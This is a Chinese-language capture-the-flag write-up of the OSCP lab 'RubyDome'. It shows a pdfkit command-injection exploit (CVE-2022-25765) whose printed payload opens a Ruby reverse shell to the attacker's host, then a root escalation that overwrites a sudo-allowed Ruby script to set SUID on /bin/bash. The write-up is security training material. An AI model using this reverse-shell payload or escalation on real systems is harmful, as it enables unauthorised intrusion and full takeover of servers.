OSCP靶场--RubyDome

0rch1d2024-03-30 10:46

OSCP靶场--RubyDome

考点(CVE-2022-25765 suid ruby提权)

1.nmap扫描

bash 复制代码 
┌──(root㉿kali)-[~/Desktop]
└─# nmap -Pn -sC -sV 192.168.249.22 --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-29 00:28 EDT
Nmap scan report for 192.168.249.22
Host is up (0.38s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
3000/tcp open  http    WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
|_http-title: RubyDome HTML to PDF
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.03 seconds

2.user priv

bash 复制代码 
##
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.249.22 - - [29/Mar/2024 00:33:00] "GET /test.html HTTP/1.1" 200 -

### 测试功能:
http://192.168.249.22:3000/

## google查找漏洞:rubydome exploit
https://github.com/UNICORDev/exploit-CVE-2022-25765
##

#######
## CVE-2022-35583 测试后发现是兔子洞:
https://github.com/advisories/GHSA-v2fj-q75c-65mr

###################
## 使用CVE-2022-25765反弹shell:
https://github.com/UNICORDev/exploit-CVE-2022-25765/blob/main/exploit-CVE-2022-25765.py


###################
##
┌──(root㉿kali)-[~/Desktop]
└─# python3 exploit-CVE-2022-25765.py -s 192.168.45.171 443 -w http://192.168.249.22:3000/pdf -p url 

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
UNICORD: Exploit for CVE-2022--25765 (pdfkit) - Command Injection
OPTIONS: Reverse Shell Sent to Target Website Mode
PAYLOAD: http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.168.45.171","443"))'`
LOCALIP: 192.168.45.171:443
WARNING: Be sure to start a local listener on the above IP and port. "nc -lnvp 443".
WEBSITE: http://192.168.249.22:3000/pdf
POSTARG: url
EXPLOIT: Payload sent to website!
SUCCESS: Exploit performed action.

######
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443                                                
listening on [any] 443 ...
192.168.249.22: inverse host lookup failed: Unknown host
connect to [192.168.45.171] from (UNKNOWN) [192.168.249.22] 35124
whoami
andrew
andrew@rubydome:~$ cat local.txt
cat local.txt
34095df9bf4237e08f9442df480866f1
andrew@rubydome:~$


这里发现是兔子洞:

反弹shell:burp抓包,exp调整:

3. root priv

bash 复制代码 
##
andrew@rubydome:~$ sudo -l
sudo -l
Matching Defaults entries for andrew on rubydome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User andrew may run the following commands on rubydome:
    (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb


####################
##
andrew@rubydome:~$ sudo -l
sudo -l
Matching Defaults entries for andrew on rubydome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User andrew may run the following commands on rubydome:
    (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb

### 当前用户可以读写/home/andrew/app/app.rb
andrew@rubydome:~$ ls -al /home/andrew/app/app.rb
ls -al /home/andrew/app/app.rb
-rwxrwx--- 1 andrew andrew 1032 Apr 24  2023 /home/andrew/app/app.rb

## 覆盖提权:kali:1.rb,开启http server:
system("chmod +s /bin/bash")

## 下载覆盖:
andrew@rubydome:~$ wget http://192.168.45.171/1.rb
wget http://192.168.45.171/1.rb
--2024-03-29 11:26:38--  http://192.168.45.171/1.rb
Connecting to 192.168.45.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29 [application/x-ruby]
Saving to: '1.rb'

1.rb                100%[===================>]      29  --.-KB/s    in 0s      

2024-03-29 11:26:39 (4.33 MB/s) - '1.rb' saved [29/29]

andrew@rubydome:~$ cat 1.rb > /home/andrew/app/app.rb
cat 1.rb > /home/andrew/app/app.rb
andrew@rubydome:~$ cat /home/andrew/app/app.rb
cat /home/andrew/app/app.rb
system("chmod +s /bin/bash")
andrew@rubydome:~$ sudo /usr/bin/ruby /home/andrew/app/app.rb
sudo /usr/bin/ruby /home/andrew/app/app.rb

## /bin/bash添加suid权限:
andrew@rubydome:~$ ls -al /bin/bash
ls -al /bin/bash
-rwsr-sr-x 1 root root 1396520 Jan  6  2022 /bin/bash
andrew@rubydome:~$ /bin/bash -p
/bin/bash -p
bash-5.1# id
id
uid=1001(andrew) gid=1001(andrew) euid=0(root) egid=0(root) groups=0(root),27(sudo),1001(andrew)
bash-5.1# cat /root/proof.txt
cat /root/proof.txt
a7f22b4d527dee98174daf20efbd168a
bash-5.1#

4.总结:

## CVE-2022-25765
https://github.com/UNICORDev/exploit-CVE-2022-25765/blob/main/exploit-CVE-2022-25765.py
## suid ruby提权:
https://gtfobins.github.io/gtfobins/ruby/#sudo
相关推荐
网络安全-杰克1 小时前
助力网络安全发展,安全态势攻防赛事可视化
网络·安全·web安全
Koi慢热3 小时前
信息收集合集
网络·安全·web安全·网络安全
南暮思鸢4 小时前
比大小王比赛
web安全·网络安全·知识分享·write up·ctf题目·hackergame 2024
南暮思鸢5 小时前
Node.js is Web Scale
经验分享·web安全·网络安全·node.js·ctf题目·hackergame 2024
网安_秋刀鱼5 小时前
PHP代码审计 - SQL注入
sql·web安全·网络安全·php·1024程序员节
B20080116刘实5 小时前
CTF攻防世界小白刷题自学笔记13
开发语言·笔记·web安全·网络安全·php
Hacker_Nightrain12 小时前
网络安全CTF比赛规则
网络·安全·web安全
网络安全指导员13 小时前
恶意PDF文档分析记录
网络·安全·web安全·pdf
渗透测试老鸟-九青14 小时前
通过投毒Bingbot索引挖掘必应中的存储型XSS
服务器·前端·javascript·安全·web安全·缓存·xss
vortex514 小时前
蓝队基础之网络七层杀伤链:从识别到防御的全方位策略
安全·网络安全·蓝队
热门推荐
01玄机平台应急响应—webshell查杀02Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO03【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总04新版微信小程序获取用户手机号05文件或文件夹名称中有空格如何批量去除06组基轨迹建模 GBTM的介绍与实现(Stata 或 R)07【TC3xx芯片】TC3xx芯片电源管理系统PMS详解08优化手机性能,解决卡顿问题:关闭这3个微信开关,释放内存空间09基于YOLOv10深度学习的CT扫描图像肾结石智能检测系统【python源码+Pyqt5界面+数据集+训练代码】深度学习实战、目标检测10【Flutter】基于 GetX 实现 Dio 的生命周期自动化